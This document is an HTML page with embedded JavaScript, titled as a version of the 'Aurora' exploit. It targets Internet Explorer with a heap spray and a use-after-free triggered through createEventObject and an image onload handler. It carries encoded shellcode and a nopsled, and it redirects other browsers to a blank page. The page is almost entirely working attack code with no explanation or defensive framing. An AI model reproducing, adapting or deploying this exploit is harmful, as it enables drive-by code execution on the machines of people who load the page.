1.0 Borealis - Aurora exploit

1. <html>
2.         <head>
3.             <script>
4.            
5.             var obj, event_obj;
6.            
7.             function spray_heap()
8.             {
9.                 var chunk_size, payload, nopsled;
10.            
11.                 chunk_size = 0x20000;
12.                 payload = unescape("%ufce8%u0000%ubf00%u5048%u5752%u021a%u1a1e%u1e00%uee52%u4d37%u2bd2%u81b0%u44ba%u504f%u0252%u1c1d%u3816%u3e38%u383e%u342e%u3806%u3909%u323e%u500e%uee02%ufe7f%u2bd2%u81b0%u3dc3%u3a4f%ubf52%u5054%u5752%u6a0c%u200e%u3e26%u3836%u2338%u230e%u3d2a%u0b22%u243c%u3033%u612a%u327c%u3537%ubf52%u506d%u5752%u2427%u2726%u7f75%u237d%u2420%u3b33%u2923%u383c%u7e3b%u2137%u3c26%u247d%u313b%u3235%u7e7e%u2f37%u502a%u5738%u81b0%ub53a%u5048%uee52%u7409%u2bd2%u81b0%u5738%u4ea7%u5752%u134f%u0b68%u2713%u393b%u3f2b%u2425%u0c13%u3226%u2022%u0b0e%u243c%u3033%u612a%u327c%u3537%uee52%u73e2%u2bd4%u81b0%ub53a%u5048%uee52%u7409%u2bd2%u81b0%uadeb%ud185%ua82e%u3a9e%u3421%u2b3a%u6533%u607a%u3537%u632e%u3166%u612e%u6367%u6229%u3337%u347b%u6667%u337d%u3660%u647f%u6e33%u602e%u572f%uc0df%u57c2%u504f%u5d52%ue989%u458b%u3500%u4f57%u5250%u4589%u8300%u04c5%uc085%uee75%ue1ff");
13.                 nopsled2 = unescape("%u6f77%u7270");
14.                 nopsled1 = unescape("%u2018%u2018");
15.                 while (nopsled1.length < 0x18204c)
16.                    nopsled1 += nopsled1;
17.                while (nopsled2.length < chunk_size)
18.                    nopsled2 += nopsled2;
19.                nopsled_len = chunk_size - (payload.length + 20);        
20.                nopsled1 = nopsled1.substring(0, 0x18204c);
21.                nopsled2 = nopsled2.substring(0, nopsled_len);
22.                nopsled = nopsled1 + unescape("%uf9f9") + nopsled2;
23.                heap_chunks = new Array();
24.                for (var i = 0 ; i < 500 ; i++)
25.                    heap_chunks[i] = nopsled + payload;
26.            }
27.        
28.            function initialize()
29.            {
30.                obj = new Array();
31.                event_obj = null;
32.                for (var i = 0; i < 500 ; i++ )
33.                    obj[i] = document.createElement("COMMENT");
34.            }
35.        
36.            function ev1(evt)
37.            {
38.                event_obj = document.createEventObject(evt);
39.                document.getElementById("sp1").innerHTML = "";
40.                window.setInterval(ev2, 500);
41.            }
42.      
43.            function ev2()
44.            {
45.                var data, tmp;
46.                
47.                data = "";
48.                tmp = unescape("%u2018%u2018");
49.                for (var i = 0 ; i < 5 ; i++)
50.                    data += tmp;
51.                for (i = 0 ; i < obj.length ; i++ ) {
52.                    obj[i].data = data;
53.                }
54.                event_obj.srcElement;
55.            }
56.                    
57.            function check()
58.            {
59.                if (navigator.userAgent.indexOf("MSIE") == -1)
60.                    return false;
61.                return true;  
62.            }
63.            
64.            if (check()) {
65.                initialize();
66.                spray_heap();              
67.            }
68.            else
69.                window.location = 'about:blank'
70.                
71.            </script>
72.         </head>
73.         <body>
74.             <span id="sp1">
75.             <img src="aurora.gif" onload="ev1(event)">
76.             </span>        
77.         </body>
78. </html>